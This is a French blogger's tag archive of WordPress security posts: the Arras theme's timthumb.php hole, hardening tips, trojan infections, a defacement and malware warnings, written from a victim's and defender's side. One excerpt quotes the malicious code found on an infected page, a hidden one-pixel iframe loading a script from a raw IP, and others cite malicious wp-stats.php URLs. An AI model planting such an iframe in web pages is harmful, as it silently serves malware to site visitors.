Articles associés au tag ‘securite’

Faille de sécurité dans le thème Arras.

Attention : ceux qui utilisent le thème Arras feraient bien de faire attention ces jours ci. Il y a des problèmes avec le fichier timthumb.php.

J’ai eu le tour (comme on dit dans le Nord) et j’ai déjà raconté ça ici. Heureusement d’ailleurs qu’OVH a mis en place des sécurités qui sont assez embarrassantes (site mis hors ligne instantanément) mais qui obligent au moins à réagir.

Quelques conseils : (suite…)

Renforcer la sécurité de WordPress

lagerfeld-et-le-gilet-jaune

Voici quelques idées et conseils pour améliorer la sécurité de son blog sous WordPress.

Au moment où un script qui tente de craquer les codes de l’admin de WordPress se balade (voir cet article de Bojan Zdrnja) dans la nature et alors que pas mal de mes installations ont été victimes d’attaques ces derniers mois, je crois que cet effort de  sécurisation n’est pas du luxe.

Cet article s’inspire de cet autre publié sur blogsecurity.

(suite…)

Cheval de troie JS:Packed-T [trj] et malware ‘HTML/Iframe-inf’

Cheval de Troie

Cheval de Troie

J’ai un site qui a été infecté par ce couple d’emmerdement juste avant le WE du premier Mai.

Le symptôme :

Les anti-virus de vos visiteurs vont se mettre à clignoter avec des messages citant ces 2 coupables :

  • Cheval de troie JS:Packed-T [trj]
  • Programme malveillant  ‘HTML/Iframe-inf’

Il me semble que ces 2 problèmes ont une seule solution.

J’ai trouvé ceci dans le code source de la page infestée :

<!-- Web Stats -->
<iframe src=http://74.222.134.170/stats.php?id=2 width=1 height=1 frameborder=0></iframe>
<!-- End Web Stats -->

D’après Field Marshall il s’agit simplement d’une ligne de texte qui s’est introduite à la fin des fichiers index.php. Field Marshall indique des méthodes basées sur des scripts à lancer sur une console pour chasser et éradiquer le problème.

De mon coté, cela me rappelle quelque chose et j’ai déjà été victime d’un troyen. C’était wp-stat et ça ressemble beaucoup à JS:Packed. Je vous recommande la lecture de cet article d’ailleurs.

J’ai commencé par éradiquer la chaine contenant le terme « iframe » avec une recherche dans les sources des derniers articles publiés. (suite…)

Encore hacké par des turcs !

J’avais déjà eu un tour du même genre en Novembre 2007. Hier voilà ce que l’on pouvait voir sur 4 de mes sites qui partagent le même compte chez OVH :

WordPress Hacked

WordPress Hacked

Bon eh bien comme d’habitude, ce n’est pas très drôle mais ça forge les caractères ces aventures.

Je remercie au passage Diévochka de Classical Network et Xavier de m’avoir prévenu très vite du problème.

Cette foi-ci je n’ai pas fait les même erreurs que la dernière foi c’est à dire paniquer et vouloir, à tout pris, remettre en ligne le site le plus vite possible. (suite…)

OVH permet à nouveau de mettre à jour son WordPress

Logo_OVH.jpgDepuis cet été (et plus pour certaines fonctions), OVH empêchait pas mal de choses pour les administrateurs des blogs WordPress. Exemple d’informations et opérations impossibles :

  • Alerte à la sortie d’une nouvelle version de WordPress.
  • Notification de mise à jour de plugin
  • Possibilité d’utiliser le plugin « instant Upgrade » pour mettre à jour WordPress.
  • Les flux RSS du tableau de bord ne se synchronisaient pas.

Cette situation était préoccupante et de nombreux clients d’OVH étaient au moins en train de réfléchir sur un changement de crèmerie…

Il est heureux que tout (?) soit maintenant rentré définitivement (?) dans l’ordre.

(suite…)

WordPress 2.6 : contrôle de sécurité avant upgrade

Voici la traduction d’un article signé UseShots et paru chez WeblogToolsCollection :

WordPress 2.6 est sorti. C’est le moment de faire une mise à jour.

N’oubliez pas de faire une vérification de sécurité avant la mise à jour.

Si vous upgradez un blog compromis, la nouvelle installation va rester compromise. Les pirates (hackers) peuvent laisser une back doors, créer un nouvel utilisateur ou voler votre mot de passe d’administration. De cette façon, même la toute dernière version de WordPress 2.6 peut être piratée.

Voici 2 outil relativement nouveaux pour vous aider : (suite…)

WordPress – trojan : http://www.wp-stats-php.info/iframe/wp-stats.php

Encore un problème sur un de mes blogs sous WordPress. Voici le message de Kaperski qui s’affiche sur une page blanche :

découvert : cheval de Troie Trojan-Downloader.HTML.Agent.is URL: http://www.wp-stats-php.info/iframe/wp-stats.php

(suite…)

Vulnérabibilité WordPress : /iframe/wp-stats.php

badware malveillantDepuis hier certains utilisateurs ont des messages bizarre en accédant à un de mes sites.

Le message vient de l’anti virus Kaperski :

découvert : cheval de Troie Trojan-Downloader.HTML.Agent.is URL: http://61.155.8.157/iframe/wp-stats.php

(suite…)

Ce site risque d’endommager votre ordinateur.

GoogleQue faire quand ce message sybillin s’affiche dans les résultats de Google, juste en dessous du titre d’une de vos page ?

Comme il se trouve que cette affaire vient d’arriver pour un site dont je m’occupe, je vais essayer de partager mon expérience.

(suite…)

Testez la sécurité de votre WordPress en ligne

Un petit utilitaire a fait son apparition aujourd’hui. Il s’agit de wp-scanner online V1.2.

Vous indiquer l’adresse d’un site à scanner et quelques minutes plus tard vous pouvez prendre connaissance d’un rapport vous avertissant de certains risques et vous conseillant éventuellement quelques mesures. (suite…)